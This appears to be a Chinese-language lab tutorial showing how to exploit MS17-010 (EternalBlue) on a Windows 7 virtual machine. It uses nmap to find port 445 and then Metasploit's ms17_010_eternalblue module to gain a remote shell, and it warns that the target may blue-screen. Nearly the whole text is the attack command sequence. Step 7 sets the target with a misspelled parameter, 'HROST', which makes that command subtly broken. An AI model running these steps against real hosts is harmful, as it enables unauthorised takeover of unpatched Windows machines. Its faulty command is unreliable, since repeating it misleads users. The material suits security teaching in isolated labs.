工具和環境:
- Nmap端口掃描器
- Metasploit漏洞檢測工具
- Kali Linux(前面的兩樣工具都在Kali Linux中有集成,是攻擊機)
- Windows 7(作爲被攻擊機,IP地址爲:192.168.229.134)
- VMware虛擬機
1. 打開Kali Linux的命令行輸入框,在命令行中輸入 "nmap -sV 192.168.229.134"掃描Windows7(被攻擊機)開放的端口以及其餘相關信息
2. 可以看到,被攻擊機的 445 端口是開放的,由此可以判斷可以基於MS17_010進行"永恆之藍攻擊"
3. 輸入"msfconsole"進入 Metasploit 命令行操作
4. 輸入 “search ms17_010” 搜索與該漏洞相關的代碼庫 (注:auxiliary開頭的代碼是輔助功能代碼;exploit開頭的是我們將要使用的滲透代碼)
5. 輸入 “use exploit/windows/smb/ms17_010_eternalblue” 調用該滲透代碼
6. 輸入 “show options” 查看該代碼可以使用的參數,爲後面設置某些參數做參考
7. 輸入 "set HROST 192.168.229.134"設置攻擊對象的IP地址,本實驗中就是把該參數設爲Windows 7的IP地址
8. 輸入 “exploit”,就是把上面設置好參數的代碼注入給被攻擊機(Windows 7)進行滲透,最後可以獲取到Windows 7的控制權,返回了Windows 7的shell界面,在上面可以進行命令行的操作,攻擊成功
注:不同的主機攻擊效果可能不同,本實驗還有一種攻擊結果是被攻擊機藍屏。